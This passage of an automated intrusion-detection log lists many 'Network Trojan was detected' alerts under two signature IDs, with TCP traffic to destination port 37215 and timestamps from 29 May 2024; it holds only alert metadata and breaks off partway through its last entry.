                SID:2835222
                Source Port:38426
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.371387
                SID:2835222
                Source Port:48718
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.374703
                SID:2829579
                Source Port:50364
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.816959
                SID:2835222
                Source Port:46098
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.944597
                SID:2835222
                Source Port:35238
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.421967
                SID:2829579
                Source Port:33248
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.870202
                SID:2835222
                Source Port:43148
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.228202
                SID:2835222
                Source Port:58852
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.855500
                SID:2829579
                Source Port:48512
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.084349
                SID:2829579
                Source Port:52650
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.883023
                SID:2835222
                Source Port:46456
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.963303
                SID:2835222
                Source Port:52526
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.562025
                SID:2835222
                Source Port:58568
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.687317
                SID:2829579
                Source Port:59714
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.604975
                SID:2829579
                Source Port:53520
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.520212
                SID:2829579
                Source Port:47852
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.965293
                SID:2829579
                Source Port:55602
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.232626
                SID:2835222
                Source Port:48472
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.960461
                SID:2835222
                Source Port:41258
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.909907
                SID:2835222
                Source Port:34880
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.629130
                SID:2835222
                Source Port:38966
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.735135
                SID:2835222
                Source Port:56906
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.653103
                SID:2835222
                Source Port:39366
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.071524
                SID:2829579
                Source Port:53938
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.831246
                SID:2829579
                Source Port:50972
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.992690
                SID:2835222
                Source Port:57560
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.807250
                SID:2829579
                Source Port:51074
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.788519
                SID:2829579
                Source Port:57016
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.522784
                SID:2835222
                Source Port:55908
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.160454
                SID:2829579
                Source Port:56446
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.321334
                SID:2835222
                Source Port:59426
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.015785
                SID:2829579
                Source Port:51848
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.228163
                SID:2835222
                Source Port:40792
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.766102
                SID:2829579
                Source Port:42700
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.557614
                SID:2835222
                Source Port:54172
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.038057
                SID:2829579
                Source Port:33978
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.660314
                SID:2829579
                Source Port:45120
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.024587
                SID:2835222
                Source Port:44632
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.947357
                SID:2829579
                Source Port:41910
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.032819
                SID:2835222
                Source Port:33414
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.091613
                SID:2835222
                Source Port:47336
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.744580
                SID:2835222
                Source Port:37606
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.795496
                SID:2829579
                Source Port:47528
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.336156
                SID:2829579
                Source Port:40656
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.868220
                SID:2835222
                Source Port:49622
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.610996
                SID:2835222
                Source Port:60606
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.816632
                SID:2835222
                Source Port:58314
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.292871
                SID:2829579
                Source Port:53424
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.793585
                SID:2835222
                Source Port:42520
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.863303
                SID:2835222
                Source Port:43938
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.234025
                SID:2829579
                Source Port:38934
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.782070
                SID:2829579
                Source Port:41158
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.039216
                SID:2829579
                Source Port:41964
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.856819
                SID:2835222
                Source Port:43792
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.501111
                SID:2835222
                Source Port:38538
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.334846
                SID:2829579
                Source Port:60886
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.209953
                SID:2829579
                Source Port:38880
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.141097
                SID:2835222
                Source Port:48762
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.929271
                SID:2835222
                Source Port:48548
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.886075
                SID:2829579
                Source Port:42218
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.073614
                SID:2829579
                Source Port:44940
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.166929
                SID:2829579
                Source Port:38978
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.208019
                SID:2835222
                Source Port:52078
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.518070
                SID:2835222
                Source Port:48222
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.640695
                SID:2835222
                Source Port:43436
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.688952
                SID:2835222
                Source Port:55452
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.967342
                SID:2835222
                Source Port:34724
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.843547
                SID:2835222
                Source Port:43146
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.899617
                SID:2829579
                Source Port:33314
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.640576
                SID:2835222
                Source Port:57130
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.110808
                SID:2835222
                Source Port:55218
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.394854
                SID:2835222
                Source Port:59194
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.501593
                SID:2835222
                Source Port:37504
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.981456
                SID:2835222
                Source Port:50258
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.432082
                SID:2829579
                Source Port:48318
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.629812
                SID:2829579
                Source Port:42666
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.620240
                SID:2829579
                Source Port:58576
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.805938
                SID:2829579
                Source Port:50056
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.854169
                SID:2835222
                Source Port:41548
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.429119
                SID:2835222
                Source Port:50382
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.916728
                SID:2829579
                Source Port:43992
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.931601
                SID:2835222
                Source Port:54802
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.026726
                SID:2835222
                Source Port:47338
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.140756
                SID:2835222
                Source Port:44974
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.714259
                SID:2829579
                Source Port:43604
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.653031
                SID:2829579
                Source Port:53116
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.506141
                SID:2835222
                Source Port:58728
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.659955
                SID:2835222
                Source Port:43270
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.418819
                SID:2829579
                Source Port:54740
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.238906
                SID:2829579
                Source Port:53806
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.286635
                SID:2829579
                Source Port:56920
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.437555
                SID:2829579
                Source Port:55584
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.942961
                SID:2829579
                Source Port:45250
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.500177
                SID:2829579
                Source Port:39318
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.264563
                SID:2835222
                Source Port:34210
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.287255
                SID:2829579
                Source Port:40070
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.465336
                SID:2835222
                Source Port:41570
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.788455
                SID:2829579
                Source Port:45758
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.286120
                SID:2835222
                Source Port:38372
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.843823
                SID:2829579
                Source Port:33924
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.927988
                SID:2835222
                Source Port:59822
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.533696
                SID:2835222
                Source Port:60298
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.559717
                SID:2829579
                Source Port:54438
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.175619
                SID:2835222
                Source Port:40984
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.329133
                SID:2835222
                Source Port:46034
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.667330
                SID:2829579
                Source Port:37340
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.267789
                SID:2829579
                Source Port:51570
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.786303
                SID:2835222
                Source Port:48790
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.361735
                SID:2829579
                Source Port:57864
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.217941
                SID:2829579
                Source Port:42112
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.559424
                SID:2835222
                Source Port:57670
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.359455
                SID:2835222
                Source Port:42498
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.455018
                SID:2829579
                Source Port:42734
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.097451
                SID:2829579
                Source Port:33552
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.228277
                SID:2829579
                Source Port:33310
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.289066
                SID:2835222
                Source Port:56080
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.092124
                SID:2829579
                Source Port:42546
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.624751
                SID:2835222
                Source Port:47354
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.728384
                SID:2829579
                Source Port:42836
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.014992
                SID:2829579
                Source Port:51096
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.155151
                SID:2835222
                Source Port:34130
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.891480
                SID:2829579
                Source Port:52892
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:26.001951
                SID:2829579
                Source Port:52718
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.228374
                SID:2835222
                Source Port:42744
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.265211
                SID:2829579
                Source Port:57858
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.983915
                SID:2835222
                Source Port:37174
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.799566
                SID:2829579
                Source Port:56730
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.222871
                SID:2829579
                Source Port:34912
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.023498
                SID:2829579
                Source Port:57802
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.899270
                SID:2829579
                Source Port:38530
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.223776
                SID:2829579
                Source Port:59104
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.462529
                SID:2829579
                Source Port:35130
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.038577
                SID:2829579
                Source Port:46130
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.022556
                SID:2829579
                Source Port:32794
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.906412
                SID:2829579
                Source Port:47312
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.880855
                SID:2835222
                Source Port:44770
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.966205
                SID:2829579
                Source Port:48172
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.732408
                SID:2835222
                Source Port:46554
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.826883
                SID:2829579
                Source Port:58336
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.883955
                SID:2835222
                Source Port:48722
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.209401
                SID:2835222
                Source Port:47968
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.272350
                SID:2829579
                Source Port:46822
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.912440
                SID:2835222
                Source Port:58940
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.045043
                SID:2829579
                Source Port:51886
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.267817
                SID:2829579
                Source Port:45478
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.672771
                SID:2835222
                Source Port:34130
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.236470
                SID:2835222
                Source Port:41736
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.466131
                SID:2829579
                Source Port:55518
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.883117
                SID:2835222
                Source Port:44386
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.360646
                SID:2835222
                Source Port:43198
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.439989
                SID:2829579
                Source Port:39402
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.563620
                SID:2829579
                Source Port:53816
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.241917
                SID:2835222
                Source Port:52594
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.914974
                SID:2829579
                Source Port:36628
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.518454
                SID:2835222
                Source Port:48170
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.573967
                SID:2835222
                Source Port:33368
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.279234
                SID:2835222
                Source Port:58872
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.975285
                SID:2829579
                Source Port:41902
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.916120
                SID:2829579
                Source Port:55906
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.445577
                SID:2829579
                Source Port:56794
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.997378
                SID:2829579
                Source Port:35638
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.972646
                SID:2835222
                Source Port:59258
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.572396
                SID:2835222
                Source Port:33230
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.984697
                SID:2829579
                Source Port:55986
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.173451
                SID:2835222
                Source Port:41166
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.039139
                SID:2829579
                Source Port:54446
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.386018
                SID:2829579
                Source Port:52750
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.654222
                SID:2835222
                Source Port:44032
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.035553
                SID:2835222
                Source Port:51540
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.420021
                SID:2829579
                Source Port:37960
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.212238
                SID:2835222
                Source Port:54248
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.074598
                SID:2829579
                Source Port:36048
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.263841
                SID:2829579
                Source Port:36968
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.987255
                SID:2835222
                Source Port:35626
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.363358
                SID:2835222
                Source Port:35190
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.080854
                SID:2835222
                Source Port:58020
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.960514
                SID:2835222
                Source Port:50238
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.359688
                SID:2835222
                Source Port:35142
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.666283
                SID:2835222
                Source Port:48334
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.932062
                SID:2835222
                Source Port:54378
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.268425
                SID:2829579
                Source Port:56826
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.794353
                SID:2835222
                Source Port:43548
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.721801
                SID:2835222
                Source Port:52590
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.560098
                SID:2829579
                Source Port:40020
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.871833
                SID:2829579
                Source Port:60046
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.278144
                SID:2829579
                Source Port:49982
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.088125
                SID:2835222
                Source Port:41132
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.870182
                SID:2829579
                Source Port:52502
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.282476
                SID:2829579
                Source Port:53540
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.873072
                SID:2829579
                Source Port:59364
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.950222
                SID:2835222
                Source Port:50184
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.026667
                SID:2829579
                Source Port:51690
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.226091
                SID:2829579
                Source Port:57028
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.959129
                SID:2835222
                Source Port:36160
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.131558
                SID:2835222
                Source Port:41986
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.666198
                SID:2835222
                Source Port:33486
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.231427
                SID:2829579
                Source Port:50724
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.994348
                SID:2829579
                Source Port:44030
                Destination Port:37215
